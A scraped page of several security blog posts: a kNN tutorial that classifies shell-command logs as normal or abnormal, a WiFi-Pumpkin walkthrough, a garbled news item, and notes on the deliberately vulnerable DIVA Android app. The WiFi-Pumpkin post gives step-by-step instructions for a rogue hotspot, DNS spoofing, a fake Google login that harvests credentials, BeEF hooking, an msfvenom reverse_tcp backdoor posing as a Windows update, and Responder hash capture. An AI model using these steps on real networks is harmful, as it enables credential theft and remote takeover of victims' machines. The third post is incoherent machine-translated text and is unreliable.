# Posted by millikan at 2020-04-17

## knn algorithm detects abnormal operation behavior (welfare ~)

## 0x00 KNN (k-nearest neighbor) algorithm

The k-nearest neighbor algorithm is a classification algorithm that classifies a sample by the distance between its feature values and those of known samples.

• Advantages: high precision, insensitive to abnormal values

• Disadvantages: high computational complexity, high spatial complexity, very sensitive to the local structure of the data

• Required data sources: numerical and nominal

• Usually K is an integer no more than 20

## 0x01 an example of KNN algorithm that is easy to understand

Which class should the green circle in the figure be assigned to, blue square or red triangle? Take the K samples closest to the green circle; whichever class accounts for the largest proportion of them is the class the circle is assigned to. When k = 3, the proportion of red triangles is 2/3, and the green circle is classified as a red triangle. When k = 5, the proportion of blue squares is 3/5, and the green circle is classified as a blue square.

Do the following for each point whose category is unknown, in turn:

• Calculate the distance between each point in the known-category dataset and the current unknown-category point

• Sort by increasing distance

• Select the k points with the smallest distance from the current point

• Determine the frequency with which each category occurs among the first k points

• Return the category with the highest frequency among the first k points as the predicted classification of the current point

## 0x02 practical example of KNN algorithm

There are two types of movies, love movies and action movies. We classify a film by the number of times fighting scenes and kissing scenes appear in it, and we have some data sets that are already classified.

## 0x03 characterize data

Data characterization is used to calculate the distance between the points in the dataset and the current unknown-category point.

Take the number of fighting shots and kissing shots as coordinates.

When classifying an unknown point: the coordinates of the green point in the coordinate system are (10,5).

Calculate the distance between the green point and each red point and each blue point:

The distance between points can be calculated according to the Pythagorean theorem.

After calculation, we get:

d1, d2, d3, d4, d5, d6.....

And so on when there are n points:

All the d obtained are sorted in ascending order and the first k points are selected. The category that occurs most often among the first k points is the category of the unknown point.

### Numerical normalization

However, when the value range of one kind of data in the data set is much larger than that of the other data, the larger differences in that term of the equation have a larger impact on the calculation result.

For example:

In this case, because the difference (3000-1000) is much larger than (5-2), the weight of (3000-1000) in the calculation result will be larger.

In most cases we want to give each feature the same weight, so when there are multiple values they should all be given the same weight. When processing feature values with different value ranges, the usual method is to normalize the values, for example to the range 0 ~ 1 or -1 ~ 1.

newValue=(oldValue−min)/(max−min)

For example, in the above movie classification: when the number of fighting shots is 5, normalize 5 to get a new result:

0.2308=(5−2)/(15−2)
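The following Python script, added here as an example rather than code from the original post, implements the five steps of 0x01 and the min-max normalization of 0x03 on a constructed movie data set. The fight and kiss counts below are made up so that the fight counts span 2..15, matching the normalization example above, and the unknown point (10,5) is the green point from 0x03.

```python
import math
from collections import Counter

# Constructed sample data (not from the original post): each row is
# ((fighting shots, kissing shots), label). Fight counts run from 2 to 15
# so that normalize_value(5, 2, 15) reproduces the post's 0.2308.
MOVIES = [
    ((15, 3), "action"),
    ((12, 2), "action"),
    ((9, 4), "action"),
    ((2, 18), "love"),
    ((3, 14), "love"),
    ((4, 12), "love"),
]


def euclidean(a, b):
    """Pythagorean distance between two points with the same number of features."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def knn_classify(point, dataset, k=3):
    """Steps from 0x01: distance to every known point, sort ascending,
    take the k nearest and return the majority label among them."""
    ranked = sorted((euclidean(point, p), label) for p, label in dataset)
    nearest = [label for _, label in ranked[:k]]
    return Counter(nearest).most_common(1)[0][0]


def normalize_value(old, lo, hi):
    """newValue = (oldValue - min) / (max - min)"""
    return (old - lo) / (hi - lo)


def min_max_normalize(dataset):
    """Scale every feature column to 0..1. Returns the scaled dataset and the
    (min, max) of each column so an unknown point can be scaled the same way."""
    columns = list(zip(*[p for p, _ in dataset]))
    ranges = [(min(c), max(c)) for c in columns]
    scaled = [
        (tuple(normalize_value(v, lo, hi) for v, (lo, hi) in zip(p, ranges)), label)
        for p, label in dataset
    ]
    return scaled, ranges


def classify_normalized(point, dataset, k=3):
    """kNN on normalized features; the unknown point uses the training ranges."""
    scaled, ranges = min_max_normalize(dataset)
    scaled_point = tuple(normalize_value(v, lo, hi) for v, (lo, hi) in zip(point, ranges))
    return knn_classify(scaled_point, scaled, k)


if __name__ == "__main__":
    print(knn_classify((10, 5), MOVIES, 3))          # raw counts
    print(round(normalize_value(5, 2, 15), 4))       # the post's example
    print(classify_normalized((10, 5), MOVIES, 3))   # normalized counts
```

Choose an odd k so that a two-class vote cannot tie; otherwise `Counter.most_common` breaks the tie by whichever label was seen first among the neighbours. The unknown point must be normalized with the same (min, max) pair as the training data, which is why `min_max_normalize` returns the ranges instead of discarding them.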

## 0x04 detect abnormal behavior operation

A cmd.txt file of about 1.5W (15,000) lines, like:

• Each line is one executed command; every 100 lines form one group.

A sign.txt file (150 lines in total) that marks whether each group (every 100 lines) is abnormal: 0 is normal, 1 is abnormal.

• If there is at least one abnormal command in a group (every 100 lines), the whole group is marked as 1.

### Step 1: data feature extraction

Since each label in the original data covers a group of 100 commands, the data in cmd.txt must be regrouped and extracted to match. Collate all the commands to obtain the cmd list and the frequencies:

```
# one inner list per group of 100 commands (illustrative, abbreviated)
cmd_list = [['cpp', 'sh', ..., 'col'], ['sh', ..., 'windows'], ..., ['mailbox', 'ksh', ..., 'ls']]
len(cmd_list)  # 150
```

Use FreqDist (word-frequency statistics for text) to sort all commands by frequency, as follows:

```
from nltk.probability import FreqDist

# flatten the 150 groups into one command stream, count each command and
# keep the commands ordered from most to least frequent
fd = FreqDist(cmd for group in cmd_list for cmd in group)
frequency_list = [cmd for cmd, _ in fd.most_common()]
# frequency_list = ['vacation', 'sh', 'sendmail', 'cpp', 'xrdb', 'mkpts', 'test', ....]
```

Organize the marking results of the sample; because the first 5K lines of the sample behave normally, their marking results are all

```
# read one label ('0' or '1') per group from sign.txt
y = list()
with open('sign.txt') as a:
    for line in a.readlines():
        line = line.strip('\n')
        y.append(line)
```

### Step 2: characterize the data

Use a word set to quantify the operation commands: the command data is converted to a specific value, and the frequency of command occurrence is used as the reference for converting each command into a data feature.

```
user_cmd_feature = list()
for every_cmd_list in cmd_list:
    v = [0] * len(frequency_list)     # one slot per command, in frequency order, initialised to 0
    for i in range(0, len(frequency_list)):
        if frequency_list[i] in every_cmd_list:   # does the i-th most frequent command appear in this group?
            v[i] += 1
    user_cmd_feature.append(v)
```

The resulting format of v is shown in the figure; each v can be understood as a point in a coordinate system.

### Step 3: test the algorithm and use

Use the Python library, passing in the data for calculation.

```
import numpy as np
from sklearn.neighbors import KNeighborsClassifier

# number of training samples
N = 90
x_train = user_cmd_feature[:N]
y_train = y[:N]                 # training data set
x_test = user_cmd_feature[N:]
y_test = y[N:]                  # test data set

neigh = KNeighborsClassifier(n_neighbors=3)   # k = 3 here
neigh.fit(x_train, y_train)

y_predict = neigh.predict(x_test)   # pass in the test data
print(y_predict)                    # results for the test data

score = np.mean(np.array(y_test) == y_predict) * 100
print(score)                        # accuracy
```

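A complete, standard-library-only version of steps 1 to 3, added here as an example (it is not the post's code and needs neither nltk nor scikit-learn): `Counter.most_common` stands in for `FreqDist`, and a small Euclidean kNN stands in for `KNeighborsClassifier`. The cmd.txt and sign.txt contents are constructed, and the groups are shrunk to 4 commands instead of 100 so the sample stays readable.

```python
import math
from collections import Counter

# Constructed stand-in for cmd.txt (not the post's data): the real file has one
# command per line; they are written four per row here only for brevity.
CMD_TXT = """
ls sh cpp sendmail
ls sh vacation xrdb
ls nc chmod sh
sh ls cpp sendmail
ls nc sh tcpdump
sh xrdb ls cpp
tcpdump sh ls nc
sh sendmail ls vacation
""".split()
GROUP_SIZE = 4   # the post uses 100 commands per label; 4 keeps the sample small

# Constructed stand-in for sign.txt: one label per group, "0" normal,
# "1" when the group contains at least one abnormal command.
SIGN_TXT = ["0", "0", "1", "0", "1", "0", "1", "0"]


def group_commands(lines, size=GROUP_SIZE):
    """Step 1: split the flat command stream into fixed-size groups (cmd_list)."""
    return [lines[i:i + size] for i in range(0, len(lines), size)]


def frequency_vocab(cmd_list):
    """Step 1: every command ordered by descending frequency (frequency_list)."""
    counts = Counter(cmd for group in cmd_list for cmd in group)
    return [cmd for cmd, _ in counts.most_common()]


def featurize(cmd_list, vocab):
    """Step 2: word-set vector per group, 1 if the command occurs in it, else 0."""
    return [[1 if cmd in group else 0 for cmd in vocab] for group in cmd_list]


def knn_predict(x_train, y_train, x_test, k=3):
    """Step 3: majority label of the k nearest training vectors (Euclidean distance)."""
    predictions = []
    for v in x_test:
        ranked = sorted(zip(x_train, y_train), key=lambda t: math.dist(t[0], v))
        votes = Counter(label for _, label in ranked[:k])
        predictions.append(votes.most_common(1)[0][0])
    return predictions


def accuracy(y_true, y_pred):
    """Percentage of test groups labelled correctly (the post's score)."""
    return 100.0 * sum(a == b for a, b in zip(y_true, y_pred)) / len(y_true)


def run(train_n=5, k=3):
    """Whole pipeline: returns (vocab, predictions for the test groups, accuracy)."""
    cmd_list = group_commands(CMD_TXT)
    vocab = frequency_vocab(cmd_list)
    x = featurize(cmd_list, vocab)
    y_pred = knn_predict(x[:train_n], SIGN_TXT[:train_n], x[train_n:], k)
    return vocab, y_pred, accuracy(SIGN_TXT[train_n:], y_pred)


if __name__ == "__main__":
    vocab, y_pred, score = run()
    print(vocab)
    print(y_pred)
    print(score)
```

On these 0/1 word-set vectors the squared Euclidean distance is simply the number of commands present in one group but not the other, so a group's neighbours are the groups with the most similar command set, no matter how often a command repeated inside a group. With k = 3 and two classes the vote cannot tie. Keep the post's ordered train/test split only if the first N groups really contain both classes; if every abnormal group falls in the test part, the classifier has never seen a 1 and will predict 0 for everything.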

## 0x05 summary

The key point of this case is characterizing the data, that is, converting specific commands into specific values. When detecting abnormal operation behavior, because the dataset is the commands executed in a user's history, we use the frequency of command occurrence as the feature for quantifying the operation commands. Of course, in practical applications frequency is not the only possible feature; similarity can also be added to the processing.

## 0x06 reference

• Getting started with machine learning of web security [https://item.jd.com/12158965.html]

• Deep learning [https://item.jd.com/12128543.html]

Donation benefits

Follow the official microblog of mlsrc, and you will get a chance to receive a classic bestseller in the field of deep learning

---Deep learning

# Posted by trammel at 2020-04-17

## describe

WiFi-Pumpkin is a complete framework for wireless penetration testing. It can forge access points to carry out man-in-the-middle attacks and also supports a number of other wireless penetration testing functions. Intended to help provide a more secure wireless network service, the tool can be used to monitor the traffic of a target user and to capture unknown users through wireless phishing, so as to monitor the target user's data traffic.

## major function

• Rogue WiFi Access Point

• Deauth Attack Clients AP

• Probe Request Monitor

• DHCP Starvation Attack

• Credentials Monitor

• Transparent Proxy

• Windows Update Attack

• Phishing Manager

• Partial Bypass HSTS protocol

• Support beef hook

• ARP Poison

• DNS Spoof

• Patch Binaries via MITM

• Karma Attack (support hostapd-mana)

• LLMNR, NBT-NS and MDNS poisoner (Responder)

• Pumpkin-Proxy (ProxyServer (mitmproxy API))

• Capture images on the fly

• TCP-Proxy (with scapy)

## Plug-in unit

### Transparent Proxy:

The transparent proxy allows users to intercept or modify traffic and at the same time inject JavaScript into the target page. Modular injection is also easy: create a Python file in the plugins/extension/ directory, and its output is displayed under the PumpkinProxy tab.

### TCP-Proxy Server

You can set up a proxy on the TCP stream. It filters the request and response flow through the scapy module and modifies the packets of the TCP protocol to achieve interception. This plug-in uses modules to view or modify the intercepted data: just add your custom module under "plugins/analyzers/" and it will be listed automatically in the TCP proxy tab.

## Install WiFi pumpkin

• `git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git`

• `pip install -r requirements.txt`

• `./installer.sh --install`

• Run WiFi-Pumpkin: `python wifi-pumpkin.py`

## Create fishing page

### Set MYSQL

• `/etc/init.d/mysql start`

• `mysql -u root`

• `create database xeus;`

• `use xeus;`

• Put the fake login page files in the /var/www directory.

• Edit the database.php file and set its content:

```
$username = "root";
$password = "";
$db_name = "xeus";
$tbl_name = "logins";
```

The content set here depends on your own environment; this is my environment.

Restart MySQL: `/etc/init.d/mysql restart`

### Set up WiFi pumpkin

Run WiFi-Pumpkin: enter its directory and run `python wifi-pumpkin.py`.

Switch to the settings tab, where you can set the SSID. Here I directly select the default SSID pumpap with channel number 11, and I enable wireless security with the password 1234567890. Note: NetworkAdapter here is the name of the wireless network card; you need to buy a wireless network card.

Then scroll down; you can see the default DHCP server settings, which can be kept as they are.

Cancel the proxy: click plugins next to it and then uncheck the proxy server, as shown in the figure.

Click start, and you can then see the wireless hotspot with the SSID pumpap on the mobile phone, including its encryption status. Enter the password that was set, 1234567890, and you can connect.

Then click DNS spoofer under modules to enter its page. Taking the default dnsspoof domain name example.com as an example, click Start attack so that DNS spoof is running.

Select the phishing manager module, select index.html in options, and click Start server. Then, after the mobile client connects to the pumpap wireless hotspot and enters the domain name example.com, the configured page appears.

Then select setdirectory, as shown in the figure, set the fake login page path configured above as the setenv path, and click Start server. You can see the forged pages in the mobile client.

Enter the mailbox and password on the fake Google page above, then look in the logins table in MySQL to see the captured information.

### Beef with attack

Run ./beef in the /usr/share/beef-xss directory, as shown in the figure, and select the hook URL.

Follow the process above to set up the pumpap wireless hotspot, enter the phishing manager module, and select set as shown in the figure.

Then click Start server to run it, connect to the pumpap wireless hotspot on the mobile client, and open the domain name example.com. The attacked machine will appear on the BeEF page, and further attacks can then be carried out through BeEF.

### Rebound shell

Generate a shellcode backdoor with the msfvenom command: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your local IP address> LPORT=4444 -f exe -o windowsupdate.exe`, then enter the msfconsole interface and wait for the shell to connect.

In the WiFi-Pumpkin settings, open the DNS spoofer interface, delete example.com from DNS spoof, and then fill in a domain name yourself (I still choose example.com here). Note that the previous example.com entry must be deleted; otherwise the port stays occupied and the subsequent operations will not succeed.

On the DNS spoofer page, select fake update to enter that page, and then add your own shellcode backdoor under this path. Here you can choose Windows update or Java update. For the network adapter choose wlan0, your own wireless network card.

Then connect to my fake pumpap wireless hotspot on the target machine and enter the domain name example.com; you land on the forged page selected above.

The Java update page is shown below.

If the target's computer downloads our backdoor and installs it, we can then get control of its computer from Kali.

Run the WiFi-Pumpkin program and select responder in advanced mode: monitor MITM attack on the interface, as shown in the figure.

Then select responder in plugins and close enable proxy server. You can open the configuration page under change (generally the defaults are fine; you can also turn options on and off according to what you want to capture), as shown in the figure.

Our main purpose is to capture the Windows account and password: perform this operation on the target machine, and the user name and password hash of the target machine will be displayed in the WiFi-Pumpkin responder.

Conclusion:

The above is mainly verified by reference to some articles. The reference articles are as follows:

http://www.freebuf.com/articles/network/137159.html

https://github.com/P0cL4bs/WiFi-Pumpkin

# Posted by tetley at 2020-04-17

Created: Oct 22, 2019, 15:36 IST . Updated: Oct 22, 2019, 15:46 IST

Coach: Kerl's congresswoman Sandad's wife is holding a post on a soap media feed from the Hibbi Earn. It was written on Facebook that it was like a rip, if you can't stop him, then enjoy him.

It was written by the wife of Congress Sandad that she had enough on the Facebook post and people thought about it. Seeing food Linda has removed her post and also apologized.

On Tuesday morning, Linda Eden posted videos on Facebook. He took a video with his husband and his wife. Congressman took the pictures of the Hebrews. They wrote in the caption: "What kind of grape, if they cannot stop it, let them taste it."

Kerl lives in this village with more than 400 children

Kerl died in three days, in a number of kingdoms, in three days.

Let me tell you that the capital of Ker's office is filled with water these days and people added it to the social media from their mail. He has seen, and people have made a mockery of them.

Let me tell you that the children of Aracolm of the Hebrews are from the set and the election won the first time. Before that, he was from the Congress party. The rules are still in place.

# Posted by tetley at 2020-04-17

## android app vulnerability learning (1)

DIVA (Damn Insecure and Vulnerable App) is a purposely designed Android app with many vulnerabilities. Its purpose is to let developers, security engineers, QA staff, etc. understand some common security problems of Android apps. Similar to DVWA, it can also be regarded as a vulnerability practice system. Download address:

`http:`

### testing environment

1. Install JDK, many tools need to use Java environment;

`https://developer.android.com/studio/index.html` `https://bitbucket.org/iBotPeaches/apktool/downloads`

`https://labs.mwrinfosecurity.com/tools/drozer/`

`https://sourceforge.net/projects/dex2jar/?source=typ_redirect`

`http:`

`http:`

### Part 1 unsafe log output

This problem is mainly caused by the app code writing sensitive information to the app's logcat. To view the logcat records of the app, you can use the following command:

2. Enter user credentials and observe the log output.

3. Source code: `Log.e()`

It can be seen that the user's input is written to the log. To look at the specific vulnerable code, open the LogActivity.class file with JD-GUI. The relevant code is shown in the figure:

### Part 2 hardcoded 1 (class source file)

Many developers use variables directly when developing apps; however, due to a lack of security development awareness, hard-coded values are used, which carry certain security risks. For the specific definition of hard coding, refer to Baidu. Developers should try to avoid hard coding during development. First look at the code involved in question 2, HardcodeActivity.class, opened in JD-GUI. The relevant code is as follows:

View HardcodeActivity.class:

The attacker only needs to enter the secret key vendorsecretkey in the app to gain access, as shown in the figure:

### Part 3 insecure storage 1 (shared_prefs/xxx.xml)

Insecure data storage is also one of the common security problems of apps, mainly in three forms:

1. Saving sensitive data in a configuration file;

2. Storing sensitive data in the local SQLite3 database;

3. Saving sensitive data in a temporary file or on the SD card.

The data stored by the SharedPreferences class is kept in .xml files under the directory

`/data/data/<app package name>/shared_prefs`

As shown in the picture:

`cd /data/data/jakhar.aseem.diva/shared_prefs`

### Part 4 insecure storage 2 (databases/xxx.db)

Sensitive information of the user is stored in the local database. Generally, the database directory corresponding to an app is:

`/data/data/<app package name>/databases`, for DIVA `/data/data/jakhar.aseem.diva/databases`

As shown in the picture:

`cd /data/data/jakhar.aseem.diva/databases`

`cd /data/data/jakhar.aseem.diva/`
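To turn Part 3 and Part 4 into a repeatable check rather than a screenshot, the following Python audit, added here as an example (it is not part of DIVA or of the original post), parses a SharedPreferences XML file and a SQLite database and reports keys or columns whose names suggest a credential and whose values are stored readable. The XML and the database are constructed in memory; on a device you would copy them out of the /data/data/<package>/shared_prefs and /data/data/<package>/databases directories named above. The SENSITIVE name pattern is an assumption to extend per app.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

# Key/column names that suggest a credential or secret. Constructed pattern
# (an assumption, not from DIVA); extend it with your own app's naming.
SENSITIVE = re.compile(r"(pass(word|wd)?|pwd|secret|token|pin|cred|api.?key|session)", re.I)

# Constructed sample of /data/data/<package>/shared_prefs/<name>.xml
# (not a file taken from DIVA itself).
SAMPLE_PREFS_XML = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="user">diva</string>
    <string name="password">p@ssw0rd</string>
    <boolean name="remember_me" value="true" />
    <int name="launch_count" value="3" />
</map>
"""


def audit_shared_prefs(xml_text):
    """Return [(key, value)] for each preference whose key looks sensitive and
    whose value is readable (SharedPreferences itself never encrypts anything)."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    findings = []
    for node in ET.fromstring(data):          # children of <map>
        key = node.get("name", "")
        # <string> holds its value as text; <int>, <boolean>, ... use a value attribute
        value = node.text if node.tag == "string" else node.get("value")
        if SENSITIVE.search(key) and value:
            findings.append((key, value))
    return findings


def audit_sqlite(conn):
    """Return [(table, column, sample_value)] for each column whose name looks
    sensitive and holds at least one non-empty value in the app's database."""
    findings = []
    cur = conn.cursor()
    tables = [r[0] for r in cur.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        columns = [r[1] for r in cur.execute('PRAGMA table_info("{}")'.format(table))]
        for col in columns:
            if not SENSITIVE.search(col):
                continue
            # identifiers come from the database's own schema; quote them as identifiers
            query = 'SELECT "{c}" FROM "{t}" WHERE "{c}" IS NOT NULL AND "{c}" != \'\' LIMIT 1'
            row = cur.execute(query.format(c=col, t=table)).fetchone()
            if row:
                findings.append((table, col, row[0]))
    return findings


def build_sample_db():
    """Constructed in-memory stand-in for /data/data/<package>/databases/<name>.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.execute("CREATE TABLE settings (id INTEGER PRIMARY KEY, theme TEXT)")
    conn.execute("INSERT INTO accounts (user, password) VALUES ('diva', 'p@ssw0rd')")
    conn.execute("INSERT INTO settings (theme) VALUES ('dark')")
    conn.commit()
    return conn


if __name__ == "__main__":
    print(audit_shared_prefs(SAMPLE_PREFS_XML))
    print(audit_sqlite(build_sample_db()))
```

A hit means the app writes that value to local storage without any protection. The fix is to keep secrets out of local storage where possible or, when they must be cached, to use EncryptedSharedPreferences from androidx.security.crypto or field-level encryption with a key held in the Android Keystore, and then to re-run the audit on the pulled files to confirm the plaintext is gone.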

### Part 6 insecure storage 4 (SD card)

Stored in SD card, vulnerability code fragment: